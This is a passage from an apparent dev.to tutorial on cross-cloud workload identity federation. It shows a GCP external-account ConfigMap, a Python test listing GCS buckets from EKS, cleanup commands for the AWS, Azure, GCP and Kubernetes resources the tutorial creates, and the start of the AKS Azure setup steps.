  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-workload-identity-config&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# replace YOUR_PROJECT_ID and PROJECT_NUMBER with actual values&lt;/span&gt;
  &lt;span class="na"&gt;config.json&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;{&lt;/span&gt;
      &lt;span class="s"&gt;"type": "external_account",&lt;/span&gt;
      &lt;span class="s"&gt;"audience": "//iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/eks-pool/providers/eks-provider",&lt;/span&gt;
      &lt;span class="s"&gt;"subject_token_type": "urn:ietf:params:oauth:token-type:jwt",&lt;/span&gt;
      &lt;span class="s"&gt;"token_url": "https://sts.googleapis.com/v1/token",&lt;/span&gt;
      &lt;span class="s"&gt;"service_account_impersonation_url": "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/eks-gcp-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com:generateAccessToken",&lt;/span&gt;
      &lt;span class="s"&gt;"credential_source": {&lt;/span&gt;
        &lt;span class="s"&gt;"file": "/var/run/secrets/tokens/eks-token"&lt;/span&gt;
      &lt;span class="s"&gt;}&lt;/span&gt;
    &lt;span class="s"&gt;}&lt;/span&gt;
&lt;span class="s"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gcp-test-code&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_gcp_from_eks.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code will be provided below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_gcp_from_eks.py
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.auth&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;default&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.cloud&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;storage&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_gcp_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;project&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;default&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="n"&gt;storage_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;storage&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;credentials&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;project&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;GCP_PROJECT_ID&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;buckets&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;storage_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_results&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;GCP Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buckets&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; GCS buckets:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;bucket&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;buckets&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;bucket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Authenticated with project: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;project&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;

    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;GCP Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_gcp_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you see logs like below for the pods &lt;code&gt;kubectl logs -f -n default eks-gcp-test&lt;/code&gt;, it means the EKS to GCP Authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;GCP Authentication successful!
Found &amp;lt;number&amp;gt; GCS buckets:
  - bucket-1
  - bucket-2
  - ...

Authenticated with project: None
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Important Note:&lt;/strong&gt; &lt;code&gt;project: None&lt;/code&gt; in the output is expected when using external account credentials. The active project is determined by the client configuration, not the credential itself.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h3&gt;
  
  
  Scenario 1 Cleanup
&lt;/h3&gt;

&lt;p&gt;After testing Scenario 1 (EKS cross-cloud authentication), clean up the resources:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# AWS Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Delete IAM role policy attachments&lt;/span&gt;
aws iam detach-role-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; eks-cross-cloud-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--policy-arn&lt;/span&gt; arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

&lt;span class="c"&gt;# Delete IAM role&lt;/span&gt;
aws iam delete-role &lt;span class="nt"&gt;--role-name&lt;/span&gt; eks-cross-cloud-role

&lt;span class="c"&gt;# Note: OIDC provider will be deleted when EKS cluster is deleted&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# Azure Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Get App ID&lt;/span&gt;
&lt;span class="nv"&gt;APP_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az ad app list &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt; eks-to-azure-app &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"[0].appId"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Delete role assignments&lt;/span&gt;
&lt;span class="nv"&gt;SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;
az role assignment delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="s2"&gt;"/subscriptions/&lt;/span&gt;&lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# Delete federated credentials&lt;/span&gt;
az ad app federated-credential delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--federated-credential-id&lt;/span&gt; eks-federated-identity

&lt;span class="c"&gt;# Delete service principal&lt;/span&gt;
az ad sp delete &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt;

&lt;span class="c"&gt;# Delete app registration&lt;/span&gt;
az ad app delete &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt;

&lt;span class="c"&gt;# Delete the resource group&lt;/span&gt;
az group delete &lt;span class="nt"&gt;--name&lt;/span&gt; eks-cross-cloud &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt; &lt;span class="nt"&gt;--yes&lt;/span&gt; &lt;span class="nt"&gt;--no-wait&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# GCP Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud projects describe &lt;span class="nv"&gt;$PROJECT_ID&lt;/span&gt; &lt;span class="nt"&gt;--format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"value(projectNumber)"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"eks-gcp-sa@&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.iam.gserviceaccount.com"&lt;/span&gt;

&lt;span class="c"&gt;# Remove IAM policy binding&lt;/span&gt;
gcloud iam service-accounts remove-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;roles/iam.workloadIdentityUser &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"principalSet://iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/eks-pool/attribute.service_account/eks-cross-cloud-sa"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# Delete bucket&lt;/span&gt;
gcloud storage buckets delete gs://eks-cross-cloud

&lt;span class="c"&gt;# Remove GCS bucket permissions (if you granted any)&lt;/span&gt;
gsutil iam ch &lt;span class="nt"&gt;-d&lt;/span&gt; serviceAccount:&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:objectViewer gs://eks-cross-cloud
gcloud projects remove-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.admin"&lt;/span&gt;

&lt;span class="c"&gt;# Delete GCP service account&lt;/span&gt;
gcloud iam service-accounts delete &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# Delete workload identity provider&lt;/span&gt;
gcloud iam workload-identity-pools providers delete eks-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--workload-identity-pool&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;eks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# Delete workload identity pool&lt;/span&gt;
gcloud iam workload-identity-pools delete eks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# Kubernetes Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Delete test pods&lt;/span&gt;
kubectl delete pod eks-aws-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete pod eks-azure-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete pod eks-gcp-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;

&lt;span class="c"&gt;# Delete ConfigMaps&lt;/span&gt;
kubectl delete configmap aws-test-code &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap azure-test-code &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap gcp-workload-identity-config &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap gcp-test-code &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;

&lt;span class="c"&gt;# Delete service account&lt;/span&gt;
kubectl delete serviceaccount eks-cross-cloud-sa &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Scenario 2: Pods Running in AKS
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; After completing this scenario, make sure to clean up the resources using the cleanup steps at the end of this section before proceeding to the next scenario to avoid resource conflicts and unnecessary costs.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Architecture Overview
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkxvt0ls72mseaboqodxz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkxvt0ls72mseaboqodxz.png" alt="aks" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Authenticating to Azure (Native Workload Identity)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Enable OIDC issuer on AKS cluster&lt;/span&gt;
az aks update &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--enable-oidc-issuer&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--enable-workload-identity&lt;/span&gt;

&lt;span class="c"&gt;# 2. Get OIDC issuer URL&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az aks show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"oidcIssuerProfile.issuerUrl"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create managed identity&lt;/span&gt;
az identity create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; aks-cross-cloud-identity &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg

&lt;span class="nv"&gt;CLIENT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az identity show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; aks-cross-cloud-identity &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; clientId &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 4. Create federated credential&lt;/span&gt;
az identity federated-credential create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; aks-federated-credential &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--identity-name&lt;/span&gt; aks-cross-cloud-identity &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--issuer&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--subject&lt;/span&gt; system:serviceaccount:default:aks-cross-cloud-sa

&lt;span class="c"&gt;# 5. Assign permissions (e.g., Storage Blob Data Reader)&lt;/span&gt;
&lt;span class="nv"&gt;SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

az role assignment create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$CLIENT_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt; &lt;span class="s2"&gt;"Storage Blob Data Reader"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="s2"&gt;"/subscriptions/&lt;/span&gt;&lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# 6. Create Storage Account&lt;/span&gt;
az storage account create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; akscrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt; eastus2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--sku&lt;/span&gt; Standard_LRS &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--kind&lt;/span&gt; StorageV2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--min-tls-version&lt;/span&gt; TLS1_2

&lt;span class="c"&gt;# 7. Create Blob Container&lt;/span&gt;
az storage container create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; test-container &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--account-name&lt;/span&gt; akscrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--auth-mode&lt;/span&gt; login

&lt;span class="c"&gt;# 8. Get Storage Account Resource ID (for proper RBAC scope)&lt;/span&gt;
&lt;span class="nv"&gt;STORAGE_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az storage account show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; akscrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
